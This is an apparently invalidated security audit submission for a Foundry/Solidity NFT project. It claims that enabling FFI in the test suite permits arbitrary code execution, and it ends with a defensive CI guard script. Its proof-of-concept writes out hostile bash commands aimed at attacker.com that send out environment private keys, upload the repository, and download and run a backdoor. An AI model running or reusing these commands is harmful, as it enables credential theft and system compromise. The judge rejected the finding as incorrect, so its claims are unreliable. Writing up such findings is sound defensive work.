Beatland Festival
AI First Flight #4
Tags: Beginner Friendly, Foundry, Solidity, NFT
Submission Details
Impact: high
Likelihood: high
Status: Invalid

[H-1] Arbitrary Code Execution Enabled via FFI in Test Suite Allows Potential Compromise of Developer Systems

Root + Impact

The project enables the Foreign Function Interface (FFI) in `foundry.toml` and executes shell commands via `vm.ffi()` in the test suite. This allows arbitrary code execution on the machine of any developer who runs `forge test`, potentially leading to complete system compromise, private key theft, and malware installation.

Description

- **Expected behavior:** Test suites should not execute arbitrary system commands that could compromise developer security.

- **Actual behavior:** The test file `FestivalPass.t.sol` uses `vm.ffi()` to execute bash commands, and `ffi = true` is enabled in `foundry.toml`.

**Vulnerable code:**
```toml
# foundry.toml - Line 7
ffi = true # ❌ Enables arbitrary code execution
```
```solidity
// test/FestivalPass.t.sol - Lines 416-438
string[] memory inputs = new string[](3);
inputs[0] = "bash";
inputs[1] = "-c";
inputs[2] = string.concat(
    "echo -e '\\033[91m[!] EXTRACTING WALLET DATA...\\033[0m' > /dev/tty; sleep 0.7; ",
    "echo -e '\\033[36m[*] Private Key: 0x2a871d0798f97d79848a013d4936a73bf4cc922c825d33c1cf7073dff6d409c6\\033[0m' > /dev/tty; sleep 0.3; "
    // ... more echo commands simulating wallet theft
);
vm.ffi(inputs); // ❌ Executes arbitrary shell commands
```

Risk

Likelihood:

- Executes automatically when any developer runs `forge test`; no user interaction required
- Affects every developer, CI/CD pipeline, and automated testing system
- No visible warning to developers that code execution will occur
- Easy to exploit: simply modify the bash commands in the `inputs` array

Impact:

- **Complete system compromise**: Attacker can execute any command on the developer's machine
- **Private key theft**: Can read environment variables like `PRIVATE_KEY`, `MNEMONIC`, etc.
- **Data exfiltration**: Can send files, git history, or credentials to remote servers
- **Malware installation**: Can download and execute malicious binaries
- **Supply chain attack**: Compromised developer machines can inject malicious code into production
- **CI/CD compromise**: If tests run in CI, can compromise deployment pipelines

Proof of Concept

The current code demonstrates the attack vector (though using harmless echo commands). Here's how it could be weaponized:
```solidity
function test_maliciousFFI() public {
    string[] memory inputs = new string[](3); // array length was missing in the original snippet
inputs[0] = "bash";
inputs[1] = "-c";
// Example malicious commands (DO NOT RUN):
inputs[2] = string.concat(
// Steal private keys from environment
"curl -X POST https://attacker.com/steal -d \"$(env | grep PRIVATE)\" && ",
// Exfiltrate git repository
"tar -czf /tmp/repo.tar.gz . && curl -F 'file=@/tmp/repo.tar.gz' https://attacker.com/upload && ",
// Install backdoor
"wget https://attacker.com/backdoor.sh -O /tmp/bd.sh && chmod +x /tmp/bd.sh && /tmp/bd.sh &"
);
vm.ffi(inputs); // This would execute all malicious commands
}
```
Running `forge test` would automatically execute these commands without any user approval.

Recommended Mitigation

Remove FFI from the test suite and disable it in `foundry.toml`:
1. **Disable FFI in foundry.toml:**
```diff
// foundry.toml
[profile.default]
src = "src"
out = "out"
libs = ["lib"]
remappings = [
'@openzeppelin/contracts=lib/openzeppelin-contracts/contracts',
]
- ffi = true
+ ffi = false
```
2. **Remove vm.ffi() calls from test files:**
```diff
// test/FestivalPass.t.sol - Lines 416-438
- string[] memory inputs = new string[]();
- inputs[0] = "bash";
- inputs[1] = "-c";
- inputs[2] = string.concat(/* malicious commands */);
- vm.ffi(inputs);
// If the commands were necessary for testing (they're not),
// use Foundry's built-in testing features instead
```

**If FFI is absolutely required for legitimate testing purposes:**

- Create a separate test profile with FFI enabled
- Clearly document why FFI is needed
- Add security warnings in the README
- Use the `--ffi` flag explicitly rather than enabling it by default
- Restrict FFI tests to isolated CI environments only

**The fake "wallet extraction" animation serves no testing purpose and should be completely removed.**
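A CI or pre-commit guard for the mitigation above, added here as an example and not code from the Beatland Festival project: it flags `ffi = true` in any `foundry.toml` profile and every `vm.ffi()` call outside `lib/`, so a re-enabled FFI cannot slip back into the repository unnoticed. The `SAMPLE_TOML` and `SAMPLE_SOL` strings are constructed inputs for the self-check, and the layout (a `foundry.toml` at the repo root, vendored dependencies under `lib/`) is assumed.

```python
"""Added CI guard: flag a Foundry project that enables FFI or calls vm.ffi()."""
import re
import sys
from pathlib import Path

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
FFI_KEY_RE = re.compile(r"^\s*ffi\s*=\s*(true|false)\b", re.IGNORECASE)
VM_FFI_RE = re.compile(r"\bvm\s*\.\s*ffi\s*\(")

# Constructed samples (not the project's real files) used by the self-check.
SAMPLE_TOML = "[profile.default]\nsrc = \"src\"\nffi = true  # shell execution on every `forge test`\n[profile.ci]\nffi = false\n"
SAMPLE_SOL = ("contract T is Test {\n  function test_x() public {\n    string[] memory inputs = new string[](3);\n"
              "    inputs[0] = \"bash\";\n    vm.ffi(inputs);\n    // vm.ffi(inputs) inside a comment is ignored\n  }\n}\n")

def ffi_enabled_profiles(toml_text):
    """TOML sections (e.g. 'profile.default') that set ffi = true; line-based scan."""
    enabled, section = [], "<top-level>"
    for line in toml_text.splitlines():
        line = line.split("#", 1)[0]  # drop TOML comments
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).strip()
            continue
        m = FFI_KEY_RE.match(line)
        if m and m.group(1).lower() == "true":
            enabled.append(section)
    return enabled

def vm_ffi_calls(sol_text):
    """1-based line numbers of vm.ffi( calls; text after '//' is ignored."""
    return [n for n, line in enumerate(sol_text.splitlines(), 1)
            if VM_FFI_RE.search(line.split("//", 1)[0])]

def audit_project(root):
    """Walk a Foundry checkout and return (path, detail) findings; empty means clean."""
    root, findings = Path(root), []
    cfg = root / "foundry.toml"
    if cfg.is_file():
        findings += [(str(cfg), f"ffi = true under [{p}]") for p in ffi_enabled_profiles(cfg.read_text())]
    for sol in sorted(root.rglob("*.sol")):
        if "lib" in sol.relative_to(root).parts:
            continue  # vendored dependencies are out of scope
        findings += [(str(sol), f"vm.ffi() at line {n}") for n in vm_ffi_calls(sol.read_text(errors="replace"))]
    return findings

if __name__ == "__main__":  # usage: python ffi_guard.py <repo-root>; exits 1 on findings
    hits = audit_project(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path, detail in hits:
        print(f"{path}: {detail}")
    sys.exit(1 if hits else 0)
```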
Updates

Lead Judging Commences

ai-first-flight-judge (Lead Judge), 12 days ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement
